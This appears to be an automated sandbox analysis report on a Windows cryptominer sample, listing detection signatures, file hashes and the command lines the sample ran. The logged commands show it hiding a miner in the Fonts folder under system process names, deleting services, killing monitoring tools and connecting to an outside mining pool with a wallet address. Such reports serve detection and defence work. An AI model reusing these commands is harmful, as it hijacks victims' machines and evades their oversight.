Analysis Overview
SHA256
ec4438d1b316a2d106e5070cc7881f9f9d9bcfaf51614bf1c768cc374bdc4ae2
Threat Level: Known bad
The file 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118 was found to be: Known bad.
Malicious Activity Summary
xmrig
Disables service(s)
XMRig Miner payload
Stops running service(s)
Deletes itself
Checks computer location settings
Executes dropped EXE
UPX packed file
Loads dropped DLL
Launches sc.exe
Drops file in Windows directory
Unsigned PE
Enumerates physical storage devices
Suspicious use of SetWindowsHookEx
Views/modifies file attributes
Runs net.exe
Kills process with taskkill
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-22 15:02
Signatures
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-22 15:02
Reported
2024-05-22 15:05
Platform
win7-20240419-en
Max time kernel
44s
Max time network
6s
Command Line
Signatures
Disables service(s)
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Stops running service(s)
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | \??\c:\windows\Fonts\svchost.exe | N/A |
| N/A | N/A | \??\c:\windows\Fonts\svchost.exe | N/A |
| N/A | N/A | \??\c:\windows\Fonts\svchost.exe | N/A |
| N/A | N/A | \??\c:\windows\Fonts\svchost.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | \??\c:\windows\Fonts\svchost.exe | C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe | N/A |
| File created | \??\c:\windows\Fonts\conhost.exe | C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe | N/A |
| File opened for modification | \??\c:\windows\Fonts\conhost.exe | C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe | N/A |
| File opened for modification | \??\c:\windows\Fonts\svchost.exe | C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
Runs net.exe
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
C:\Windows\SysWOW64\net.exe
net stop Microsarver
C:\Windows\SysWOW64\sc.exe
sc delete Microsarver
C:\Windows\SysWOW64\net.exe
net stop Samsorver
C:\Windows\SysWOW64\sc.exe
sc delete Samsorver
C:\Windows\SysWOW64\net.exe
net stop lanmanserver /y
C:\Windows\SysWOW64\sc.exe
sc config lanmanserver start= DISABLED 2>nul
C:\Windows\SysWOW64\sc.exe
sc delete lanmanserver
C:\Windows\SysWOW64\net.exe
net stop mssecsvc2.0
C:\Windows\SysWOW64\sc.exe
sc delete mssecsvc2.0
C:\Windows\SysWOW64\net.exe
net stop mssecsvc2.1
C:\Windows\SysWOW64\sc.exe
sc delete mssecsvc2.1
C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install Microsarver c:\windows\Fonts\conhost.exe
\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set Microsarver DisplayName Network Location Service
\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set Microsarver Description Provides performance library information from Windows Management.
\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start Microsarver
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Microsarver
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mssecsvc2.0
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop lanmanserver /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Samsorver
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mssecsvc2.1
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tem.vbs"
Network
Files
memory/1968-0-0x0000000000400000-0x00000000009C1000-memory.dmp
\Windows\Fonts\svchost.exe
| MD5 | 0a7d7ed55c4202f5106824f11ecb22fa |
| SHA1 | 730da74e178d7b114e5d4c0f1dcc956accd4942d |
| SHA256 | 5657876e79df5212f255b4bfb0f69df9b09be4ae833e1b170de78a37b7179595 |
| SHA512 | 45a4652d229491c936b0fd5839b335ae924d5b7ee5b05925ebb2f0bb8ca030fca9544ecf4050089b04195e877fcdae4657cd29621299e053398093ee4e5fadb7 |
memory/1968-21-0x0000000000400000-0x00000000009C1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tem.vbs
| MD5 | f88a489a387ebc7c4c0c6b122ff6aa9b |
| SHA1 | 197f045b81fc47892ec4b879f4b55ef1fda8f307 |
| SHA256 | 8d6df3f20ca96ef6e033fe7c442f76784bed8aad65e7272b384175e4b9412a5a |
| SHA512 | 046a13ce212c374adf315b1d3c95bf4044feee01b44eaa91b48cb1885660899473f5934031b1fef8ee2639fa4b322e83ebea1ad42fbb9100fd3f66fd3b59c391 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-22 15:02
Reported
2024-05-22 15:05
Platform
win10v2004-20240508-en
Max time kernel
149s
Max time network
147s
Command Line
Signatures
Disables service(s)
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | \??\c:\windows\Fonts\svchost.exe | N/A |
| N/A | N/A | \??\c:\windows\Fonts\svchost.exe | N/A |
| N/A | N/A | \??\c:\windows\Fonts\svchost.exe | N/A |
| N/A | N/A | \??\c:\windows\Fonts\svchost.exe | N/A |
| N/A | N/A | \??\c:\windows\Fonts\svchost.exe | N/A |
| N/A | N/A | \??\c:\windows\Fonts\conhost.exe | N/A |
| N/A | N/A | \??\c:\windows\Fonts\svchost.exe | N/A |
| N/A | N/A | \??\c:\windows\Fonts\svchost.exe | N/A |
| N/A | N/A | \??\c:\windows\Fonts\svchost.exe | N/A |
| N/A | N/A | \??\c:\windows\Fonts\svchost.exe | N/A |
| N/A | N/A | \??\c:\windows\Fonts\svchost.exe | N/A |
| N/A | N/A | \??\c:\windows\Fonts\KvMonXP.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | \??\c:\windows\Fonts\svchost.exe | \??\c:\windows\Fonts\conhost.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Fonts | C:\Windows\SysWOW64\attrib.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | \??\c:\windows\Fonts\KvMonXP.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe | N/A |
| N/A | N/A | \??\c:\windows\Fonts\conhost.exe | N/A |
| N/A | N/A | \??\c:\windows\Fonts\conhost.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
Processes
C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
C:\Windows\SysWOW64\net.exe
net stop Microsarver
C:\Windows\SysWOW64\sc.exe
sc delete Microsarver
C:\Windows\SysWOW64\net.exe
net stop Samsorver
C:\Windows\SysWOW64\sc.exe
sc delete Samsorver
C:\Windows\SysWOW64\net.exe
net stop lanmanserver /y
C:\Windows\SysWOW64\sc.exe
sc config lanmanserver start= DISABLED 2>nul
C:\Windows\SysWOW64\sc.exe
sc delete lanmanserver
C:\Windows\SysWOW64\net.exe
net stop mssecsvc2.0
C:\Windows\SysWOW64\sc.exe
sc delete mssecsvc2.0
C:\Windows\SysWOW64\net.exe
net stop mssecsvc2.1
C:\Windows\SysWOW64\sc.exe
sc delete mssecsvc2.1
\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install Microsarver c:\windows\Fonts\conhost.exe
\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set Microsarver DisplayName Network Location Service
\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set Microsarver Description Provides performance library information from Windows Management.
\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start Microsarver
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Microsarver
C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop lanmanserver /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Samsorver
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mssecsvc2.0
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mssecsvc2.1
\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tem.vbs"
\??\c:\windows\Fonts\conhost.exe
"c:\windows\Fonts\conhost.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /im taskmgr.exe /f /T
C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /im rundll32.exe /f /T
C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /im autoruns.exe /f /T
C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /im perfmon.exe /f /T
C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /im procexp.exe /f /T
C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /im ProcessHacker.exe /f /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /im taskmgr.exe /f /T
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
C:\Windows\SysWOW64\taskkill.exe
taskkill /im ProcessHacker.exe /f /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /im rundll32.exe /f /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /im autoruns.exe /f /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /im procexp.exe /f /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /im perfmon.exe /f /T
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install Samsorver KvMonXP -o stratum+tcp://max.csrss.website:5555 -u 49tzxeXRHecDF4bHMDFU4iRpVqHTJiYJiJxv4MgkD2JMCjw3UQSWV3qBbZqDHfsNEbDzU8hLq9UqH4MBoxy36RBvFuVfasv -p x -k --donate-level=1 --max-cpu-usage=50 --print-time=5 --nicehash
\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set Samsorver DisplayName WMI Performance Services
\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set Samsorver Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start Samsorver
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe
C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
\??\c:\windows\Fonts\KvMonXP.exe
"KvMonXP" -o stratum+tcp://max.csrss.website:5555 -u 49tzxeXRHecDF4bHMDFU4iRpVqHTJiYJiJxv4MgkD2JMCjw3UQSWV3qBbZqDHfsNEbDzU8hLq9UqH4MBoxy36RBvFuVfasv -p x -k --donate-level=1 --max-cpu-usage=50 --print-time=5 --nicehash
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
